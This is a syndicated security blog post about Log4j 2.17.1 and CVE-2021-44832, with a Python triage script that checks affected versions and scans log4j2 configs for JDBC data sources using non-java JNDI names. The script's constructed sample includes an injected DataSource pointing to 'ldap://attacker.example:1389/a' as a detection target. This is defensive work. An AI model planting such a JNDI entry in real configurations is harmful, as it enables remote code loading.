
Log4j 2.17.1 fixes another code execution bug, but should you worry?


Yesterday, Apache released Log4j version 2.17.1, which squashes a newly discovered code execution bug, tracked as CVE-2021-44832. Our Log4j vulnerability resource center has since been updated to reflect ongoing download trends and statistics for 2.17.1.

But the quasi-alarming code execution bug isn’t as trivial to exploit as the original critical Log4Shell vulnerability (CVE-2021-44228) that set the internet on fire.

Before we dive into the vulnerability details and whether you need to worry about it, some context: the possibility of an “RCE” flaw in Log4j 2.17.0 was first raised on Twitter by a researcher yesterday, before any formal disclosure had taken place. This led to a flood of researchers from the InfoSec community questioning and trying to validate the claim.

Fortunately, the researcher later clarified that the bug is an arbitrary code execution rather than a remote code execution, exploitable only under very specific circumstances, although both Apache’s advisory and the CVE entry classify the flaw as an “RCE.”


Screen capture of the initial Twitter post and reply.

This did not sit well with everyone in the community [1, 2, 3, 4], many of whom had to dedicate significant time and effort to investigating whether the latest stable version prior to yesterday, Log4j 2.17.0, contained yet another serious vulnerability. Moreover, this came during an unusually taxing holiday month for InfoSec professionals already underwater with the Log4j debacle.

Dissecting the Vulnerability

Assigned a ‘moderate’ severity and a CVSS score of 6.6, CVE-2021-44832 concerns non-default configurations of Log4j versions from 2.0-beta7 up to and including 2.17.0 (excluding the backported fix releases 2.3.2 and 2.12.4). It also requires an attacker to have “write” permissions (Read more...)
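As an added triage example (this is not code from the Sonatype post or from the Log4j project), the script below checks the two things that decide whether CVE-2021-44832 applies to a given deployment: whether the Log4j version falls inside the affected range quoted above, and whether a log4j2 XML configuration wires a JDBC Appender to a JNDI DataSource whose name uses a scheme other than java: (the pattern that the 2.17.1 fix refuses). The sample configuration, the host name attacker.example and the function names are my own constructions for illustration.

```python
"""Triage helper for CVE-2021-44832 (Log4j 2.x JDBC Appender, JNDI DataSource).

Check 1: is the deployed Log4j 2.x version in the affected range?
Check 2: does a log4j2 XML config give a JDBC Appender a DataSource whose
         jndiName uses a scheme other than java: (e.g. ldap:, rmi:)?
The sample configuration at the bottom is constructed, not from a real system.
"""
import re
import xml.etree.ElementTree as ET

# Range from the Apache advisory: 2.0-beta7 through 2.17.0, minus the two
# backported fix releases. Log4j 1.x is a different code base and sorts below.
AFFECTED_LOW = "2.0-beta7"
AFFECTED_HIGH = "2.17.0"
FIXED_BACKPORTS = {"2.3.2", "2.12.4"}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_RANK = 3  # a final release sorts after any alpha/beta/rc of that number


def version_key(version):
    """Turn '2.0-beta7', '2.12.4' or '2.17.1' into a sortable tuple."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised Log4j version string: %r" % version)
    major, minor, patch, tag, tag_num = m.groups()
    rank = _PRERELEASE_RANK[tag.lower()] if tag else _FINAL_RANK
    return (int(major), int(minor), int(patch or 0), rank, int(tag_num or 0))


def is_affected_version(version):
    """True if this Log4j version is inside the CVE-2021-44832 range."""
    v = version.strip()
    if v in FIXED_BACKPORTS:
        return False
    return version_key(AFFECTED_LOW) <= version_key(v) <= version_key(AFFECTED_HIGH)


def _attr(elem, wanted):
    """Case-insensitive attribute lookup (Log4j2 config attributes are)."""
    return next((v for k, v in elem.attrib.items() if k.lower() == wanted), "")


def _jndi_scheme(name):
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.\-]*):", name)
    return m.group(1).lower() if m else None


def find_risky_jdbc_datasources(config_xml):
    """Return [(appender_name, jndiName)] for JDBC appenders whose DataSource
    uses a non-java: JNDI scheme. A name with no scheme is resolved by the
    local initial context and is treated as acceptable, as 2.17.1 does."""
    findings = []
    for appender in ET.fromstring(config_xml).iter():
        tag = appender.tag.lower()
        is_jdbc = tag == "jdbc" or (tag == "appender" and _attr(appender, "type").lower() == "jdbc")
        if not is_jdbc:
            continue
        for ds in appender.iter():
            if ds.tag.lower() != "datasource":
                continue
            jndi_name = _attr(ds, "jndiname")
            if _jndi_scheme(jndi_name) not in (None, "java"):
                findings.append((_attr(appender, "name") or "?", jndi_name))
    return findings


def triage(version, config_xml):
    """Combine both checks into a one-line verdict."""
    if not is_affected_version(version):
        return "not affected: version %s is outside the CVE-2021-44832 range" % version
    findings = find_risky_jdbc_datasources(config_xml)
    if not findings:
        return "affected version %s, but no JDBC appender uses a non-java JNDI data source" % version
    return "affected version %s with risky JDBC data sources: %s" % (
        version, ", ".join(name for name, _ in findings))


# Constructed sample: a normal container-managed pool, plus the kind of entry
# someone with write access to the config file could add.
SAMPLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="AuditDb" tableName="audit_log">
      <DataSource jndiName="java:comp/env/jdbc/AuditDS"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <Appender type="JDBC" name="Injected" tableName="x">
      <DataSource jndiName="ldap://attacker.example:1389/a"/>
      <Column name="message" pattern="%m"/>
    </Appender>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="AuditDb"/></Root>
  </Loggers>
</Configuration>
"""

if __name__ == "__main__":
    for v in ("2.17.0", "2.17.1", "2.12.4", "2.0-beta6"):
        print(v, "affected" if is_affected_version(v) else "not affected")
    print(triage("2.17.0", SAMPLE_CONFIG))
```

The version check alone tells you whether to patch; the config check tells you whether the non-default precondition is actually met. Either way, the real control is the one the advisory points at: whoever can write to the logging configuration already has a foothold, so restrict write access to log4j2.xml as tightly as you restrict deployment credentials.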

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/log4j-another-code-execution-bug-should-you-worry